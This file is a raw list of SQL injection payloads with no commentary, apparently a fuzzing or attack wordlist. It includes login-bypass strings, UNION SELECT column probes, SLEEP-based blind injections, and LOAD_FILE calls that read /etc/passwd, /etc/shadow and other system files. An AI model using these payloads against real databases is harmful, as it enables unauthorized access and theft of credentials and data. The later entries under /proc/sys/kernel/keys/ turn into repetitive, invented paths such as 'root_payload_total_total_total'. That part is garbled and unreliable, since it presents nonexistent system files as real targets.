'
''
`
"
' OR '1'='1
' OR 1=1--
' UNION SELECT NULL--
' AND 1=CAST((SELECT version()) AS INT)--
' OR (SELECT 1 FROM (SELECT SLEEP(5))a)--
' OR SLEEP(5)--
' AND SLEEP(5)--
' AND 1=1--
' AND 1=2--
1' ORDER BY 1--+
1' ORDER BY 1000--+
' GROUP BY columnnames having 1=1 --
-1 UNION SELECT 1,2,3--
-1' UNION SELECT 1,2,3--
' OR EXISTS(SELECT * FROM information_schema.tables)--
') OR ('1'='1
' OR '1'='1' --
' OR '1'='1' ({
' OR '1'='1' /*
' OR '1'='1' /*!
' OR '1'='1' #
' OR '1'='1' --
' OR '1'='1'/*
' OR '1'='1'/**/
' OR '1'='1' UNION SELECT 1,2,3--
' OR '1'='1' UNION SELECT 1,2,3,4--
' OR '1'='1' UNION SELECT 1,2,3,4,5--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6,7--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6,7,8--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6,7,8,9--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
' OR '1'='1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
' OR '1'='1' UNION SELECT NULL--
' OR '1'='1' UNION SELECT NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' OR '1'='1' UNION SELECT @@version--
' OR '1'='1' UNION SELECT version()--
' OR '1'='1' UNION SELECT database()--
' OR '1'='1' UNION SELECT user()--
' OR '1'='1' UNION SELECT current_user()--
' OR '1'='1' UNION SELECT session_user()--
' OR '1'='1' UNION SELECT system_user()--
' OR '1'='1' UNION SELECT @@hostname--
' OR '1'='1' UNION SELECT @@datadir--
' OR '1'='1' UNION SELECT @@basedir--
' OR '1'='1' UNION SELECT @@tmpdir--
' OR '1'='1' UNION SELECT @@slave_load_tmpdir--
' OR '1'='1' UNION SELECT @@innodb_data_home_dir--
' OR '1'='1' UNION SELECT @@innodb_log_group_home_dir--
' OR '1'='1' UNION SELECT @@character_sets_dir--
' OR '1'='1' UNION SELECT @@lc_messages_dir--
' OR '1'='1' UNION SELECT @@plugin_dir--
' OR '1'='1' UNION SELECT @@secure_file_priv--
' OR '1'='1' UNION SELECT LOAD_FILE('/etc/passwd')--
' OR '1'='1' UNION SELECT LOAD_FILE('/etc/hosts')--
' OR '1'='1' UNION SELECT LOAD_FILE('/etc/shadow')--
' OR '1'='1' UNION SELECT LOAD_FILE('C:\\Windows\\win.ini')--
' OR '1'='1' UNION SELECT LOAD_FILE('C:\\boot.ini')--
' OR '1'='1' UNION SELECT LOAD_FILE('C:\\Windows\\System32\\drivers\\etc\\hosts')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/self/cmdline')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/version')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/cpuinfo')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/meminfo')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/mounts')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/arp')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/tcp')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/udp')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/fib_trie')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/route')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/dev')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/snmp')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/sockstat')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/sockstat6')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/netstat')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip_conntrack')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/stat/nf_conntrack')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip_tables_names')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip_tables_matches')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip_tables_targets')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip6_tables_names')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip6_tables_matches')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/net/ip6_tables_targets')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/hostname')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/domainname')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/osrelease')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/ostype')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/version')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/uuid')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/boot_id')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/entropy_avail')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/poolsize')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/read_wakeup_threshold')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/write_wakeup_threshold')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/urandom_min_reseed_secs')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/random/trust_cpu')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/randomize_va_space')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/pid_max')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/threads-max')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/panic')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/panic_on_oops')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/printk')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/printk_ratelimit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/printk_ratelimit_burst')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/sysrq')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/core_pattern')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/core_uses_pid')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/ctrl-alt-del')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/modprobe')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/hotplug')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/acpi_video_flags')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/tainted')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/unknown_nmi_panic')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/panic_on_unrecovered_nmi')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/panic_on_io_nmi')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/panic_on_warn')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/print-fatal-signals')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/gc_delay')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_maxkeys')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_maxbytes')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_reserved')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_allocated')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_used')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_bytes')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_hard_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_soft_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_min')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_max')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_avg')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_bytes')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_hard_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_soft_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_min')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_max')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_avg')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_bytes')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_hard_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_soft_limit')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_min')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_max')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_avg')--
' OR '1'='1' UNION SELECT LOAD_FILE('/proc/sys/kernel/keys/root_payload_total_total_total')--